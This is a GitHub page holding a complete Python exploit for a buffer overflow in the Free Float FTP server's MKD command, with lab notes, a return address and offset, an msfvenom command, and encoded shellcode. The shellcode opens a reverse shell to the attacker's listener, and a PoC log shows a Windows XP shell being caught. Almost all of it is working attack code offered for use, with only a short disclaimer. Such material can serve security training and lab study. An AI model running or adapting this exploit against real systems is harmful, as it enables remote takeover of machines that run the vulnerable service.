-
Notifications
You must be signed in to change notification settings - Fork 3
/
exploit-freefloatftp.py
81 lines (74 loc) · 3.24 KB
/
exploit-freefloatftp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#!/usr/bin/python
#
# July 2017 | github.com/rafaveira3
#
# Exploit Free Float FTP - 'MKD' Buffer Overflow
#
# How I tested it:
# - 1 Kali attacking machine and 1 Windows XP (Metasploitable will do) in the same local host network using virtualbox.
# - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE)
# http://www.exploit-db.com/wp-content/themes/exploit/applications/687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver.zip
# - Just run the binary and the service will be running
# - pattern_create.rb and pattern_offset.rb = 247
# - Bachars = \x00\x0a\x0d
# - Return Address found at 0x7ca58265 (JMP ESP) | SHELL32.dll
# - Generated the payload using msfvenom
#
# PoC:
# terminal 1
# root@kali: python exploit-freefloatftp.py
# terminal 2
# root@kali:~# nc -nlvp 443
# listening on [any] 443 ...
# connect to [10.0.0.36] from (UNKNOWN) [10.0.0.44] 1047
# Microsoft Windows XP [vers�o 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Joe\Meus documentos>
#
# Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems.
# Accessing a computer system or network without authorization or explicit permission is illegal.
#
#
import socket
import sys
eip = "\x65\x82\xa5\x7c"
nops = "\x90"*20
# msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.0.0.36 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
#Payload size: 351 bytes
shellcode = ("\xd9\xc1\xd9\x74\x24\xf4\x5a\xbe\x6a\x9f\x74\x89\x29\xc9\xb1"
"\x52\x83\xea\xfc\x31\x72\x13\x03\x18\x8c\x96\x7c\x20\x5a\xd4"
"\x7f\xd8\x9b\xb9\xf6\x3d\xaa\xf9\x6d\x36\x9d\xc9\xe6\x1a\x12"
"\xa1\xab\x8e\xa1\xc7\x63\xa1\x02\x6d\x52\x8c\x93\xde\xa6\x8f"
"\x17\x1d\xfb\x6f\x29\xee\x0e\x6e\x6e\x13\xe2\x22\x27\x5f\x51"
"\xd2\x4c\x15\x6a\x59\x1e\xbb\xea\xbe\xd7\xba\xdb\x11\x63\xe5"
"\xfb\x90\xa0\x9d\xb5\x8a\xa5\x98\x0c\x21\x1d\x56\x8f\xe3\x6f"
"\x97\x3c\xca\x5f\x6a\x3c\x0b\x67\x95\x4b\x65\x9b\x28\x4c\xb2"
"\xe1\xf6\xd9\x20\x41\x7c\x79\x8c\x73\x51\x1c\x47\x7f\x1e\x6a"
"\x0f\x9c\xa1\xbf\x24\x98\x2a\x3e\xea\x28\x68\x65\x2e\x70\x2a"
"\x04\x77\xdc\x9d\x39\x67\xbf\x42\x9c\xec\x52\x96\xad\xaf\x3a"
"\x5b\x9c\x4f\xbb\xf3\x97\x3c\x89\x5c\x0c\xaa\xa1\x15\x8a\x2d"
"\xc5\x0f\x6a\xa1\x38\xb0\x8b\xe8\xfe\xe4\xdb\x82\xd7\x84\xb7"
"\x52\xd7\x50\x17\x02\x77\x0b\xd8\xf2\x37\xfb\xb0\x18\xb8\x24"
"\xa0\x23\x12\x4d\x4b\xde\xf5\x78\x8c\xe0\x21\x15\x8e\xe0\x28"
"\x5e\x07\x06\x40\xb0\x4e\x91\xfd\x29\xcb\x69\x9f\xb6\xc1\x14"
"\x9f\x3d\xe6\xe9\x6e\xb6\x83\xf9\x07\x36\xde\xa3\x8e\x49\xf4"
"\xcb\x4d\xdb\x93\x0b\x1b\xc0\x0b\x5c\x4c\x36\x42\x08\x60\x61"
"\xfc\x2e\x79\xf7\xc7\xea\xa6\xc4\xc6\xf3\x2b\x70\xed\xe3\xf5"
"\x79\xa9\x57\xaa\x2f\x67\x01\x0c\x86\xc9\xfb\xc6\x75\x80\x6b"
"\x9e\xb5\x13\xed\x9f\x93\xe5\x11\x11\x4a\xb0\x2e\x9e\x1a\x34"
"\x57\xc2\xba\xbb\x82\x46\xca\xf1\x8e\xef\x43\x5c\x5b\xb2\x09"
"\x5f\xb6\xf1\x37\xdc\x32\x8a\xc3\xfc\x37\x8f\x88\xba\xa4\xfd"
"\x81\x2e\xca\x52\xa1\x7a")
buffer = "A"*247 + eip + nops + shellcode + "C"*(1000-247-4-20-351)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('10.0.0.44',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + buffer + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close